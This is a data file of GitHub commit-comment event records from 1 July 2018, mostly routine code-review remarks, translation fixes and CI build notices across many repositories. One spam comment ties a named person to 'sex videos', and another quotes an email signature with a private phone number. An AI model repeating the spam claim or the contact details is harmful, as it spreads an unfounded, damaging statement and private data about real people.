{"id":"7903579738","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"valerycadovic/NET.S.2018.Chadovich.03"},"payload":{"comment":{"id":29559238,"position":17,"line":17,"path":"NET.S.2018.Chadovich.03/Day3/Algorithms.cs","commit_id":"20b2cf3650461d98ca3f29fb1719e3c959e1f58f","created_at":"2018-07-01T19:52:43Z","updated_at":"2018-07-01T19:52:43Z","author_association":"NONE","body":"Коду-клиенту не известны те исключения, которые может выбросить этот метод"}},"created_at":"2018-07-01T19:52:43Z"}
{"id":"7903581149","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29559241,"position":null,"line":null,"path":null,"commit_id":"55cc4f045a711b5ac66bbc7660c05caa4cc3a098","created_at":"2018-07-01T19:53:44Z","updated_at":"2018-07-01T19:53:44Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Регистрация по приглашению](https://trello.com/c/jWapIJWF/47-%D1%80%D0%B5%D0%B3%D0%B8%D1%81%D1%82%D1%80%D0%B0%D1%86%D0%B8%D1%8F-%D0%BF%D0%BE-%D0%BF%D1%80%D0%B8%D0%B3%D0%BB%D0%B0%D1%88%D0%B5%D0%BD%D0%B8%D1%8E)"}},"created_at":"2018-07-01T19:53:44Z"}
{"id":"7903582165","type":"CommitCommentEvent","actor":{"login":"evanwill"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29559245,"position":null,"line":null,"path":null,"commit_id":"0b2f1ac4d4bc4d70b5c697ba14bf240f51864c23","created_at":"2018-07-01T19:54:28Z","updated_at":"2018-07-01T19:54:28Z","author_association":"MEMBER","body":"@dcnb there is an important little fix in here, deleting an unnecessary `</div>` on line 33 what was causing the next buttons to take up the entire right and left side of the windows. "}},"created_at":"2018-07-01T19:54:28Z"}
{"id":"7903582737","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559247,"position":16,"line":16,"path":"linkshell_service/linkshell_service.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T19:54:54Z","updated_at":"2018-07-01T19:54:54Z","author_association":"MEMBER","body":"`local handle_color`"}},"created_at":"2018-07-01T19:54:54Z"}
{"id":"7903583418","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559249,"position":8,"line":8,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T19:55:22Z","updated_at":"2018-07-01T19:55:22Z","author_association":"NONE","body":"XML комментарии!!!"}},"created_at":"2018-07-01T19:55:22Z"}
{"id":"7903584528","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559252,"position":11,"line":11,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T19:56:07Z","updated_at":"2018-07-01T19:56:07Z","author_association":"NONE","body":"не экономить на названиях формальных параметров, это неявно часть спецификации"}},"created_at":"2018-07-01T19:56:07Z"}
{"id":"7903585140","type":"CommitCommentEvent","actor":{"login":"virensihag"},"repo":{"name":"atefm/Android-Object-Detection"},"payload":{"comment":{"id":29559253,"position":null,"line":null,"path":null,"commit_id":"afd41d074a5ce3f5cabc6c05a0c37abda7ec0a50","created_at":"2018-07-01T19:56:35Z","updated_at":"2018-07-01T19:56:35Z","author_association":"NONE","body":"Hey Atif , need some help regarding this project . can we modify this project to detect static images ?"}},"created_at":"2018-07-01T19:56:35Z"}
{"id":"7903585247","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559254,"position":13,"line":13,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T19:56:39Z","updated_at":"2018-07-01T19:56:39Z","author_association":"NONE","body":"  if (precision <= 0 || precision >= 1)"}},"created_at":"2018-07-01T19:56:39Z"}
{"id":"7903585466","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559255,"position":4,"line":4,"path":"linkshell_service/linkshell_service.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T19:56:49Z","updated_at":"2018-07-01T19:56:49Z","author_association":"MEMBER","body":"shared objects and the table that represent their data are the exception to 'local' since they'll get garbage collected if they aren't in the global environment"}},"created_at":"2018-07-01T19:56:49Z"}
{"id":"7903585695","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29559256,"position":null,"line":null,"path":null,"commit_id":"83ef25b562eb4df9ec3fb0e1a46d292a42a280b2","created_at":"2018-07-01T19:56:59Z","updated_at":"2018-07-01T19:56:59Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [При запросе конкретного события (/api/event/{{id}}) не возвращается evenType[Id]](https://trello.com/c/2skt5FHO/43-%D0%BF%D1%80%D0%B8-%D0%B7%D0%B0%D0%BF%D1%80%D0%BE%D1%81%D0%B5-%D0%BA%D0%BE%D0%BD%D0%BA%D1%80%D0%B5%D1%82%D0%BD%D0%BE%D0%B3%D0%BE-%D1%81%D0%BE%D0%B1%D1%8B%D1%82%D0%B8%D1%8F-api-event-id-%D0%BD%D0%B5-%D0%B2%D0%BE%D0%B7%D0%B2%D1%80%D0%B0%D1%89%D0%B0%D0%B5%D1%82%D1%81%D1%8F-eventypeid)"}},"created_at":"2018-07-01T19:56:59Z"}
{"id":"7903586102","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559257,"position":519,"line":519,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T19:57:17Z","updated_at":"2018-07-01T19:57:17Z","author_association":"COLLABORATOR","body":"Мне кажется, здесь должно быть \"использовать bech32-адрес\""}},"created_at":"2018-07-01T19:57:17Z"}
{"id":"7903586269","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/openjpeg-feedstock"},"payload":{"comment":{"id":29559258,"position":null,"line":null,"path":null,"commit_id":"81c2a2777ac5e96ed4fb0c0e7d7de82e27c4b2ee","created_at":"2018-07-01T19:57:24Z","updated_at":"2018-07-01T19:57:24Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T19:57:24Z"}
{"id":"7903586571","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559259,"position":530,"line":530,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T19:57:37Z","updated_at":"2018-07-01T19:57:37Z","author_association":"COLLABORATOR","body":"Total — это всё-таки не \"все\", а \"всего\""}},"created_at":"2018-07-01T19:57:37Z"}
{"id":"7903586697","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29559260,"position":15,"line":34,"path":"src/NosCore.Controllers/CommandPacketController.cs","commit_id":"e94d238a8d8b177d1d19657eb1a56eae22f76f13","created_at":"2018-07-01T19:57:43Z","updated_at":"2018-07-01T19:57:43Z","author_association":"COLLABORATOR","body":"session is not used "}},"created_at":"2018-07-01T19:57:43Z"}
{"id":"7903586760","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559261,"position":7,"line":7,"path":"linkshell_service/linkshell_service.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T19:57:46Z","updated_at":"2018-07-01T19:57:46Z","author_association":"MEMBER","body":"See above, and you only need next in the environment if the library implements an iterator with a `:call` that uses `next`"}},"created_at":"2018-07-01T19:57:46Z"}
{"id":"7903588002","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559262,"position":514,"line":514,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"df46d634c245ff83cabb0404a39c778cb998ed62","created_at":"2018-07-01T19:58:42Z","updated_at":"2018-07-01T19:58:42Z","author_association":"COLLABORATOR","body":"Вместо\r\n`чтение\\запись` должно быть `чтение\\/запись`, не?"}},"created_at":"2018-07-01T19:58:42Z"}
{"id":"7903588365","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29559264,"position":23,"line":23,"path":"NET.S.2018.Shaveko.03/NewtonMethod/NewtonMethodSqrt.cs","commit_id":"b0fb080608f7c42805c8bfbcb55bdbdb51f5afac","created_at":"2018-07-01T19:58:59Z","updated_at":"2018-07-01T19:58:59Z","author_association":"NONE","body":"лишние скобки ухудшают читаемость"}},"created_at":"2018-07-01T19:58:59Z"}
{"id":"7903588879","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-3-js"},"payload":{"comment":{"id":29559265,"position":null,"line":null,"path":null,"commit_id":"2c96a136c4b9ffa49f17e2bd88f3809fe4180e1f","created_at":"2018-07-01T19:59:23Z","updated_at":"2018-07-01T19:59:23Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-01T19:59:23Z"}
{"id":"7902301029","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/natureTours"},"payload":{"comment":{"id":29556196,"position":10,"line":23,"path":"index.html","commit_id":"07af9d3685a2e9d7a5bd46da37f68bc5db540a26","created_at":"2018-07-01T02:01:41Z","updated_at":"2018-07-01T02:01:41Z","author_association":"OWNER","body":"wrapped header in a <span class\"lorem\"> so that i could style both headers independently, however the full header would be listed for SEO purposes."}},"created_at":"2018-07-01T02:01:41Z"}
{"id":"7902302312","type":"CommitCommentEvent","actor":{"login":"ravanareddyb"},"repo":{"name":"ravanareddyb/Myproject"},"payload":{"comment":{"id":29556200,"position":null,"line":null,"path":null,"commit_id":"402a068d4b883e46a785a10c83985691fdde99ac","created_at":"2018-07-01T02:03:07Z","updated_at":"2018-07-01T02:03:07Z","author_association":"OWNER","body":"Hi Ravana\r\n\r\nI am fine\r\n\r\nWat about u\r\n"}},"created_at":"2018-07-01T02:03:07Z"}
{"id":"7902305511","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/natureTours"},"payload":{"comment":{"id":29556202,"position":6,"line":48,"path":"css/style.css","commit_id":"4ce3067bcac40394cc7a4d6a35245227ddb73aec","created_at":"2018-07-01T02:06:48Z","updated_at":"2018-07-01T02:06:48Z","author_association":"OWNER","body":"absolute position is in relation to parent element .header.\r\n"}},"created_at":"2018-07-01T02:06:48Z"}
{"id":"7902307246","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/natureTours"},"payload":{"comment":{"id":29556203,"position":8,"line":50,"path":"css/style.css","commit_id":"4ce3067bcac40394cc7a4d6a35245227ddb73aec","created_at":"2018-07-01T02:08:33Z","updated_at":"2018-07-01T02:08:33Z","author_association":"OWNER","body":"Specifies how far an absolutely positioned box's top margin edge is offset below the top edge of the box's 'containing block'. or parent!"}},"created_at":"2018-07-01T02:08:33Z"}
{"id":"7902307782","type":"CommitCommentEvent","actor":{"login":"felipecaetanosilva"},"repo":{"name":"EdyKnopfler/mac0439-fase3"},"payload":{"comment":{"id":29556205,"position":null,"line":null,"path":null,"commit_id":"8ebd9c3cc3e8d1239fc2afd78fd4ff700dcd2389","created_at":"2018-07-01T02:09:09Z","updated_at":"2018-07-01T02:09:09Z","author_association":"COLLABORATOR","body":"Signed off bfiefleerasilfffefefefefeffefe"}},"created_at":"2018-07-01T02:09:09Z"}
{"id":"7902308184","type":"CommitCommentEvent","actor":{"login":"felipecaetanosilva"},"repo":{"name":"EdyKnopfler/mac0439-fase3"},"payload":{"comment":{"id":29556206,"position":null,"line":null,"path":null,"commit_id":"8ebd9c3cc3e8d1239fc2afd78fd4ff700dcd2389","created_at":"2018-07-01T02:09:36Z","updated_at":"2018-07-01T02:09:36Z","author_association":"COLLABORATOR","body":"Signed off by: Felipe Caetano Silva\r\ne \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nCamila Naomi Kodaira"}},"created_at":"2018-07-01T02:09:36Z"}
{"id":"7902308596","type":"CommitCommentEvent","actor":{"login":"felipecaetanosilva"},"repo":{"name":"EdyKnopfler/mac0439-fase3"},"payload":{"comment":{"id":29556207,"position":null,"line":null,"path":null,"commit_id":"8ebd9c3cc3e8d1239fc2afd78fd4ff700dcd2389","created_at":"2018-07-01T02:10:04Z","updated_at":"2018-07-01T02:10:04Z","author_association":"COLLABORATOR","body":"Signed off by: Camila e Felipe"}},"created_at":"2018-07-01T02:10:04Z"}
{"id":"7902315059","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/natureTours"},"payload":{"comment":{"id":29556216,"position":10,"line":52,"path":"css/style.css","commit_id":"4ce3067bcac40394cc7a4d6a35245227ddb73aec","created_at":"2018-07-01T02:16:35Z","updated_at":"2018-07-01T02:16:35Z","author_association":"OWNER","body":" makes element exactly centered within the parent element"}},"created_at":"2018-07-01T02:16:35Z"}
{"id":"7902316339","type":"CommitCommentEvent","actor":{"login":"isaacwcr"},"repo":{"name":"isaacwcr/PIXEL-ART-MAKER"},"payload":{"comment":{"id":29556217,"position":null,"line":null,"path":null,"commit_id":"ba1575022a63f489be429e006a606a057379b46c","created_at":"2018-07-01T02:18:05Z","updated_at":"2018-07-01T02:18:05Z","author_association":"OWNER","body":"DONE\r\n"}},"created_at":"2018-07-01T02:18:05Z"}
{"id":"7902317731","type":"CommitCommentEvent","actor":{"login":"jaesmon"},"repo":{"name":"jaesmon/inmobiliaria-techo"},"payload":{"comment":{"id":29556219,"position":null,"line":null,"path":null,"commit_id":"e2e9d24b14906fa8d4291045003c3e66b0464d74","created_at":"2018-07-01T02:19:30Z","updated_at":"2018-07-01T02:19:30Z","author_association":"OWNER","body":"yml"}},"created_at":"2018-07-01T02:19:30Z"}
{"id":"7902318127","type":"CommitCommentEvent","actor":{"login":"Ford2010"},"repo":{"name":"web2py/web2py-book"},"payload":{"comment":{"id":29556220,"position":1,"line":510,"path":"sources/29-web2py-english/07.markmin","commit_id":"8706e3611e6b7d69d96be2abc28a76e991f8c8fe","created_at":"2018-07-01T02:19:57Z","updated_at":"2018-07-01T02:19:57Z","author_association":"NONE","body":"Eric J Zehrung sex videos from Virginia "}},"created_at":"2018-07-01T02:19:57Z"}
{"id":"7902318188","type":"CommitCommentEvent","actor":{"login":"nrfaikar"},"repo":{"name":"nrfaikar/testGit"},"payload":{"comment":{"id":29556221,"position":4,"line":2,"path":"README.md","commit_id":"81ee992b9f9ffa49552d1346d25fb9894409b77e","created_at":"2018-07-01T02:20:02Z","updated_at":"2018-07-01T02:20:02Z","author_association":"OWNER","body":"ini apaan?\r\n"}},"created_at":"2018-07-01T02:20:02Z"}
{"id":"7902318563","type":"CommitCommentEvent","actor":{"login":"ahmadf20"},"repo":{"name":"nrfaikar/testGit"},"payload":{"comment":{"id":29556222,"position":4,"line":2,"path":"README.md","commit_id":"81ee992b9f9ffa49552d1346d25fb9894409b77e","created_at":"2018-07-01T02:20:24Z","updated_at":"2018-07-01T02:20:24Z","author_association":"COLLABORATOR","body":"apa apa\r\n"}},"created_at":"2018-07-01T02:20:24Z"}
{"id":"7902319196","type":"CommitCommentEvent","actor":{"login":"tt369"},"repo":{"name":"ethpool-update-project/open-callisto-pool-README-v2"},"payload":{"comment":{"id":29556223,"position":null,"line":null,"path":null,"commit_id":"55bf399c774595bba56372fc4e09028aefb1fa13","created_at":"2018-07-01T02:21:09Z","updated_at":"2018-07-01T02:21:09Z","author_association":"NONE","body":"I built a callisto swimming pool, but it is often dropped"}},"created_at":"2018-07-01T02:21:09Z"}
{"id":"7902319269","type":"CommitCommentEvent","actor":{"login":"Ford2010"},"repo":{"name":"web2py/web2py-book"},"payload":{"comment":{"id":29556224,"position":1,"line":510,"path":"sources/29-web2py-english/07.markmin","commit_id":"8706e3611e6b7d69d96be2abc28a76e991f8c8fe","created_at":"2018-07-01T02:21:14Z","updated_at":"2018-07-01T02:21:14Z","author_association":"NONE","body":"MY hidden fikes"}},"created_at":"2018-07-01T02:21:14Z"}
{"id":"7902330382","type":"CommitCommentEvent","actor":{"login":"zfreedman"},"repo":{"name":"tylermcginnis/react-fundamentals"},"payload":{"comment":{"id":29556243,"position":null,"line":null,"path":null,"commit_id":"3155df53a5888a965744f3993085fc9221d190fd","created_at":"2018-07-01T02:33:27Z","updated_at":"2018-07-01T02:33:27Z","author_association":"NONE","body":"Providing a link to this comment on the course page might help. Still, super clear."}},"created_at":"2018-07-01T02:33:27Z"}
{"id":"7902336638","type":"CommitCommentEvent","actor":{"login":"jaesmon"},"repo":{"name":"jaesmon/inmobiliaria-techo"},"payload":{"comment":{"id":29556244,"position":null,"line":null,"path":null,"commit_id":"e2e9d24b14906fa8d4291045003c3e66b0464d74","created_at":"2018-07-01T02:40:40Z","updated_at":"2018-07-01T02:40:40Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-01T02:40:40Z"}
{"id":"7902337625","type":"CommitCommentEvent","actor":{"login":"scotthibbs"},"repo":{"name":"nouse4anick/FDLog"},"payload":{"comment":{"id":29556245,"position":27,"line":2249,"path":"fdlog.py","commit_id":"47f44368c4076844731e8a3fbb5f3c98cdf1d891","created_at":"2018-07-01T02:41:51Z","updated_at":"2018-07-01T02:41:51Z","author_association":"NONE","body":"That would be great! I would love the help!\n\nAs for the network fix: I noted in my code that I found it on stack\noverflow. It was needed because Ubuntu (and derivatives) has 127.0.0.1 in\nthe etc/hosts file which gets returned instead of the ip. Instead of having\nusers change their operating system's host file, it was suggested to grab\nit by the socket name. Looks like it is still an acceptable solution on\nstack overflow. So far it has worked on all systems that I have tried.\n\nI just past several emails with Alan Biocca (the original creator) talking\nabout different enhancements we have made. I want to grab his \"out of\norder\" entry when I'm done with my delete/edit work.\n\nIs there anything you want to work on?\n\n\nScott Hibbs\n\nComputer Technology Services\nI deliver technology fixes\n812-581-0631\n\n\n\nOn Sat, Jun 30, 2018 at 4:51 PM, Art Miller <notifications@github.com>\nwrote:\n\n> I've used the current version on my raspberry pi for some time now, I'm\n> thinking there has to be a better way of getting the address universally, I\n> just haven't had time to research it.\n>\n> I'm also fairly new to github contributing to other projects, I needed\n> something fast and quick that everyone in the club im in could use\n> regardless of the system, cloning fdlog to my repository was a quick and\n> dirty fix. I'll hop over to your repository and take a look at your stuff\n> when i get the chance.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nouse4anick/FDLog/commit/47f44368c4076844731e8a3fbb5f3c98cdf1d891#commitcomment-29555481>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMiJxTE4VInIhP6XoqZud31_sZHZ1Xb3ks5uB-TigaJpZM4U3SqF>\n> .\n>\n"}},"created_at":"2018-07-01T02:41:51Z"}
{"id":"7902338943","type":"CommitCommentEvent","actor":{"login":"01speed1"},"repo":{"name":"Afh21/adoptame"},"payload":{"comment":{"id":29556250,"position":21,"line":58,"path":"server/controllers/donation-controller.js","commit_id":"dc92883b3b6b24d320fc648e6b0e71ab0af6994f","created_at":"2018-07-01T02:43:26Z","updated_at":"2018-07-01T02:43:26Z","author_association":"CONTRIBUTOR","body":"recuerde que el update no trae el documento modificado "}},"created_at":"2018-07-01T02:43:26Z"}
{"id":"7902339545","type":"CommitCommentEvent","actor":{"login":"klondikemarlen"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29556251,"position":null,"line":null,"path":null,"commit_id":"459c583c969392295fbcadb46bcbc65d08ee61d5","created_at":"2018-07-01T02:44:07Z","updated_at":"2018-07-01T02:44:07Z","author_association":"COLLABORATOR","body":"Nice 👍 "}},"created_at":"2018-07-01T02:44:07Z"}
{"id":"7902341200","type":"CommitCommentEvent","actor":{"login":"klondikemarlen"},"repo":{"name":"elthran/BookingSystem"},"payload":{"comment":{"id":29556255,"position":10,"line":86,"path":"booking/models/users.py","commit_id":"b5c4ce88ac74bfdf8c36d32dec30317365b59ba0","created_at":"2018-07-01T02:46:00Z","updated_at":"2018-07-01T02:46:00Z","author_association":"COLLABORATOR","body":"Wow, I love the sort ... I didn't even know you could pass in to keys."}},"created_at":"2018-07-01T02:46:00Z"}
{"id":"7902341490","type":"CommitCommentEvent","actor":{"login":"01speed1"},"repo":{"name":"Afh21/adoptame"},"payload":{"comment":{"id":29556256,"position":4,"line":17,"path":"server/models/user-model.js","commit_id":"dc92883b3b6b24d320fc648e6b0e71ab0af6994f","created_at":"2018-07-01T02:46:19Z","updated_at":"2018-07-01T02:46:19Z","author_association":"CONTRIBUTOR","body":"Sheriff ? xD\r\n"}},"created_at":"2018-07-01T02:46:19Z"}
{"id":"7902341711","type":"CommitCommentEvent","actor":{"login":"rch33"},"repo":{"name":"jordanlui/Omron-Arduino"},"payload":{"comment":{"id":29556257,"position":null,"line":null,"path":null,"commit_id":"7a86ac8094d3e5b7b8becd9b5e222810f3f598a1","created_at":"2018-07-01T02:46:35Z","updated_at":"2018-07-01T02:46:35Z","author_association":"NONE","body":" Hey, I downloaded your zip from\"https://github.com/rch33/Omron-Arduino\"\n\n| \n| \n| \n|  |  |\n\n |\n\n |\n| \n|  | \nrch33/Omron-Arduino\n\nOmron-Arduino - Arduino code to get data out of the incredible 4x4 IR OMRON D6T MEMS sensor.\n |\n\n |\n\n |\n\n\n\nWhen I try to compile your source (Mac osx 10.13.5, Arduino app) I get thismron-d6t4x4.cpp.o: In function `loop':\n/Users/richardhaight/omron-d6t4x4.ino:31: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:31: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:31: undefined reference to `TwoWireExt::beginReception(unsigned char)'\n/Users/richardhaight/omron-d6t4x4.ino:34: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:34: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:34: undefined reference to `TwoWireExt::get_byte()'\n/Users/richardhaight/omron-d6t4x4.ino:37: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:37: undefined reference to `WireExt'\n/Users/richardhaight/omron-d6t4x4.ino:37: undefined reference to `TwoWireExt::endReception()'\ncollect2: error: ld returned 1 exit status\nError compiling.\n\nI previously downloaded \"Omron-Arduino-master.zip\" and did the usual library add. I thought it should work.\nBTW: I noticed that your ...8L test program had \"#include WireExt.h\" commented out.\n\n\n\n\n    On Friday, June 29, 2018, 11:55:37 AM EDT, Jordan Lui <notifications@github.com> wrote:  \n \n \nI haven't worked with the Particle.io Photon hardware. When you try it, please let me know how it works!\nI assume that it should work similarly if the hardware supports I2C or SPI. The buffer size was an issue with Arduino because the default buffer wasn't big enough to receive the Omron signal. I don't know if this will be a similar issue for the Photon.\n\nGood luck!\nJordan\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n   "}},"created_at":"2018-07-01T02:46:35Z"}
{"id":"7902343595","type":"CommitCommentEvent","actor":{"login":"fabianochagas"},"repo":{"name":"fabianochagas/ionic_class1"},"payload":{"comment":{"id":29556261,"position":null,"line":null,"path":null,"commit_id":"645c6bf15d3444a260cc9c23386aebe78de3f54d","created_at":"2018-07-01T02:48:51Z","updated_at":"2018-07-01T02:48:51Z","author_association":"OWNER","body":"Aula de ionic \r\nhttps://www.youtube.com/watch?v=mDPgmRlArPc&list=PLE4aWcuKhzABV7naOADbDusXVPRv58vd-\r\n\r\nSENSACIONAL"}},"created_at":"2018-07-01T02:48:51Z"}
{"id":"7902344504","type":"CommitCommentEvent","actor":{"login":"jaesmon"},"repo":{"name":"jaesmon/inmobiliaria-techo"},"payload":{"comment":{"id":29556262,"position":null,"line":null,"path":null,"commit_id":"cb4bf997ee2bb60628c6acc792536bb1c3c8e1fb","created_at":"2018-07-01T02:49:57Z","updated_at":"2018-07-01T02:49:57Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-01T02:49:57Z"}
{"id":"7902347182","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29556264,"position":null,"line":null,"path":null,"commit_id":"32d65d1644a42e768563f86e9e460e78b537d0af","created_at":"2018-07-01T02:52:51Z","updated_at":"2018-07-01T02:52:51Z","author_association":"MEMBER","body":"Oh, it's here  https://github.com/orgs/passionate-coder/teams/tm-classicstart/discussions/8\r\n\r\nBasically it is to distinguish from 4.3.x which is under Ivo's development. \r\n\r\n@XenHat \r\n\r\nGuess we can easily bump the version number on next push?\r\nIf not we can discuss about it 😉 "}},"created_at":"2018-07-01T02:52:51Z"}
{"id":"7902348974","type":"CommitCommentEvent","actor":{"login":"yinkaiwen"},"repo":{"name":"yinkaiwen/YinKaiwenApp"},"payload":{"comment":{"id":29556271,"position":null,"line":null,"path":null,"commit_id":"11f66a9e36bbd5cfc7a7e27e4ba601ea48b06331","created_at":"2018-07-01T02:55:01Z","updated_at":"2018-07-01T02:55:01Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-01T02:55:01Z"}
{"id":"7902349176","type":"CommitCommentEvent","actor":{"login":"jgabrielmaia"},"repo":{"name":"michellamin/dcc091frontEnd"},"payload":{"comment":{"id":29556272,"position":null,"line":null,"path":null,"commit_id":"00b60ba68f3d1613d77c4a2098417340c4e73b3b","created_at":"2018-07-01T02:55:14Z","updated_at":"2018-07-01T02:55:14Z","author_association":"COLLABORATOR","body":"Stable communication version"}},"created_at":"2018-07-01T02:55:14Z"}
{"id":"7902350060","type":"CommitCommentEvent","actor":{"login":"zhangweidavid"},"repo":{"name":"lettuce-io/lettuce-core"},"payload":{"comment":{"id":29556274,"position":null,"line":null,"path":null,"commit_id":"486b28de18babf0ffb69653a1d023b7af9ad8869","created_at":"2018-07-01T02:56:19Z","updated_at":"2018-07-01T02:56:19Z","author_association":"NONE","body":"It might be better to go straight back in the last statement"}},"created_at":"2018-07-01T02:56:19Z"}
{"id":"7902351650","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29556275,"position":null,"line":null,"path":null,"commit_id":"e4ef063c996b1283218b1dd9b5829e7a4e1c7d0a","created_at":"2018-07-01T02:58:11Z","updated_at":"2018-07-01T02:58:11Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.195`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/195) :tada:"}},"created_at":"2018-07-01T02:58:11Z"}
{"id":"7902352159","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29556276,"position":null,"line":null,"path":null,"commit_id":"e4ef063c996b1283218b1dd9b5829e7a4e1c7d0a","created_at":"2018-07-01T02:58:45Z","updated_at":"2018-07-01T02:58:45Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.295`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/398721574) :tada:"}},"created_at":"2018-07-01T02:58:45Z"}
{"id":"7903591210","type":"CommitCommentEvent","actor":{"login":"Sugisakii"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559276,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T20:00:52Z","updated_at":"2018-07-01T20:00:52Z","author_association":"NONE","body":"@DarkMatterMatt You are right, but that is to do it manually, I just provide a simple injection of code to the original and periodically search for updates, update it and restart it automatically"}},"created_at":"2018-07-01T20:00:52Z"}
